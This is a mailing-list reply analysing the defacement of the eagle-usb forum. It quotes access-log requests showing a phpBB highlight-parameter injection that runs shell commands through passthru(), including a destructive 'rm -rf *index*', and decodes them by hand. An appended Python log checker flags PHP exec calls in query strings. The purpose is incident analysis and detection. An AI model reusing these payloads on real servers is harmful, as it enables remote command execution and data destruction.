Benoit Audouard wrote :
| Hi,
| The forum was defaced at 13:42 today...
| a nasty cracker replaced erased index.php at root of
| http://forum.eagle-usb.org
| with an index.html like this one :
|
| http://forum.eagle-usb.org/index_cracke.html
| (contains only text)

OK. I just quickly looked at the logs:
At 13:42 :
"GET /viewtopic.php?t=%31%39%32%38&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20%75%6E%61%6D%65%20%2D%61%3B%69%64%3B%75%70%74%69%6D%65%3B%70%77%64%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1"
"GET /viewtopic.php?t=%31%39%32%38&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20%72%6D%20%2D%72%66%20%2A%69%6E%64%65%78%2A%3B%65%63%68%6F%20%4B%61%30%74%69%63%20%4C%61%62%20%3E%3E%20%69%6E%64%65%78%2E%68%74%6D%6C%3B%63%61%74%20%69%6E%64%65%78%2E%68%74%6D%6C%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1"
Which together can be translated into:
"GET /viewtopic.php?t=1928&rush=echo _START_; uname -a;id;uptime;pwd;
echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1"
"GET /viewtopic.php?t=1928&rush=echo _START_; rm -rf *index*;echo Ka0tic
Lab >> index.html;cat index.html; echo >>
_END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 HTTP/1.1"
Nice one, isn't it? By chance they only did a rm *index* :)
The other fact is that the source address seems to originate directly
from brasiltelecom.net.br ...
I'm going to send a mail to the brasiltelecom abuse service ... perhaps they
will have enough logs to find this out ...
--
Frederick Ros aka Sleeper
Follow each decision as closely as possible with its associated action.
- The Elements of Programming Style (Kernighan & Plauger)
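
Added example, not part of the original message: a small Python log check that follows the same decoding done by hand above, unwinding the double-encoded `%2527` and flagging a PHP execution call carried in a query parameter. The function names, the list of PHP functions and the threshold of 8 encoded characters are assumptions made for this illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# PHP functions that run commands or code; a call to one inside a query
# parameter is the signal (assumed list for this example, extend as needed).
PHP_EXEC_CALL = re.compile(
    r"\b(passthru|system|shell_exec|exec|popen|proc_open|eval)\s*\(", re.I)
# Percent-encoded letters/digits: URL syntax never requires encoding them, so
# a run of them suggests the payload is being hidden from plain string matches.
ENCODED_ALNUM = re.compile(r"%(3[0-9]|[46][1-9A-Fa-f]|[57][0-9Aa])")


def fully_decode(value, max_rounds=5):
    """Percent-decode until stable, so %2527 -> %27 -> ' is followed through."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_request(request_line):
    """Return (decoded_params, findings) for a 'METHOD target PROTO' line."""
    parts = request_line.strip('"').split()
    target = parts[1] if len(parts) >= 2 else ""
    raw_query = urlsplit(target).query
    params = {name: fully_decode(value)
              for name, value in parse_qsl(raw_query, keep_blank_values=True)}
    findings = [f"{name}: PHP {m.group(1)}() call in parameter"
                for name, value in params.items()
                if (m := PHP_EXEC_CALL.search(value))]
    if len(ENCODED_ALNUM.findall(raw_query)) >= 8:  # assumed threshold
        findings.append("query percent-encodes plain letters/digits")
    return params, findings


# First request quoted in the message above, then a constructed benign one.
ATTACK = ("GET /viewtopic.php?t=%31%39%32%38"
          "&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20%75%6E%61%6D%65%20%2D%61"
          "%3B%69%64%3B%75%70%74%69%6D%65%3B%70%77%64%3B%20%65%63%68%6F%20%5F%45%4E%44%5F"
          "&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F"
          "%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1")
BENIGN = "GET /viewtopic.php?t=1928&highlight=driver%20install HTTP/1.1"

if __name__ == "__main__":
    for line in (ATTACK, BENIGN):
        print(inspect_request(line))
```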
